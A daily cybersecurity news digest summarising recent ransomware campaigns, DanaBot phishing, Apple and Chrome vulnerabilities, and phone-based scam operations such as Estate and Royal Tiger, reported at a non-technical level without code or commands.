Security experts and law enforcement's efforts to combat ransomware threats are set to intensify with new sophisticated campaigns. "Your document" and "Photo of you???” are among sensitive and personal subject lines that cybercriminals are using in the new LockBit Black ransomware campaign. Orchestrated by the Phorpiex botnet, adversaries have sent millions of such phishing emails worldwide. Meanwhile, news about INC Ransom's migration to a new platform is propagating, coupled with reports of its source code being put up for sale. The rumors are still in the air.

Back in the headlines is the DanaBot malware spreading through sophisticatedly disguised job application emails containing external links. Additionally, fresh findings from Sekoia research reveal sophisticated cyberattacks deploying Mallox ransomware via MS-SQL honeypots.

Top Malware Reported in the Last 24 Hours

INC Ransom source code put on sale

A cybercriminal going by the moniker ‘salfetka’ has been spotted selling the source code of the INC Ransom RaaS operation. The sale offers Windows and Linux/ESXi versions of the ransomware. Meanwhile, the ransomware group is allegedly transitioning to a new data leak extortion platform, hinting at internal changes or a rebranding effort. Some experts say the sale could potentially be a scam.

DanaBot infection via external links

DanaBot malware operators are exploiting documents containing external links to evade detection, unveiled ASEC. Attackers send spam emails disguised as a job application form to deceive recipients. The analysis revealed the malware's propagation - from Word attachment execution to DanaBot installation via PowerShell. The malware can steal a variety of data, including screenshots and credentials.

Phorpiex botnet used in LockBit Black ransomware campaign

Security experts at New Jersey’s Cybersecurity and Communications Integration Cell warned of a LockBit Black ransomware campaign orchestrated by the re-emerged Phorpiex botnet group. Since April, millions of phishing emails with ZIP attachments have been sent. The new botnet version, dubbed Twizt, operates peer-to-peer, evading traditional detection methods. With over 1,500 unique sending IP addresses, the campaign spans multiple countries.

Unveiling the tactics of Mallox ransomware

The Sekoia research team's MS-SQL honeypot incident exposed the intricate methods of cyberattackers wielding Mallox ransomware. Brute-force attacks on vulnerable MS-SQL servers, leveraging the PureCrypter loader, revealed two distinct affiliates with varied approaches. The ransomware group employs a double extortion tactic and utilizes affiliates like Maestro and Vampire. Suspicions arose around hosting company Xhost Internet, linked to past ransomware activities.

Top Vulnerabilities Reported in the Last 24 Hours

Apple products vulnerable to multiple exploits

Numerous security issues in Apple products have been found to pose significant risks to users, with the most severe flaw allowing arbitrary code execution. Tracked as CVE-2024-23296, the bug threatens government and business entities. Criminals are using techniques like Exploitation for Client Execution (T1203) wherein they potentially gain kernel privileges or bypass security measures. These vulnerabilities span macOS, iOS, iPadOS, watchOS, and tvOS.

Apple addresses code execution threat in iTunes

Apple issued a security advisory addressing an arbitrary code execution vulnerability (CVE-2024-27793) found in iTunes for Windows versions lower than 12.13.1. This flaw could allow attackers to execute malicious code or cause unexpected program termination by parsing a malicious file. Apple recommends users update to iTunes version 12.13.2 to mitigate this issue. The severity of the vulnerability is yet to be classified.

Second Chrome zero-day found within a week

Google released patches for another zero-day vulnerability in Chrome, identified as CVE-2024-4761, marking the second zero-day addressed by the company in a week. This high-severity out-of-bounds write issue in the V8 JavaScript and WebAssembly engine was reported by an anonymous researcher. While Google acknowledges the existence of an exploit in the wild, no details on the attacks have been disclosed.

Top Scams Reported in the Last 24 Hours

Inside a sophisticated phone-based cyberattack

Cybercriminals laid bare Estate - an interception operation active since mid-2023. The campaign involves unsolicited phone calls and phishing emails to trick victims into divulging one-time passcodes, leading to bypassing MFA and hijacking accounts. A bug in Estate’s code exposed the site’s back-end database, revealing tailored attack scripts, target demographics, and a promise of anonymity to members.

Enterprises targeted with spam emails and phone calls

Rapid7 uncovered an ongoing social engineering campaign aimed at enterprises, involving a threat actor inundating users' email accounts with spam messages and following up with phone calls to offer assistance. The emails masquerade as legitimate newsletter sign-up confirmations. Upon contacting users, the threat actor impersonates the company's IT team, persuading them to install RMM software to resolve the purported email issues.

FCC issues alert against scammer group

The FCC alerted users regarding a group of robocall scammers known as Royal Tiger, marking them as the first Consumer Communications Information Services Threat (C-CIST). Led by Prince Jashvantlal Anand and Kaushal Bhavsar, Royal Tiger operates in multiple countries and has utilized various entities for illegal robocall campaigns targeting U.S. consumers. Despite previous warnings and cease-and-desist letters, the group continues to perpetuate imposter scams, including spoofed calls impersonating banks and government agencies.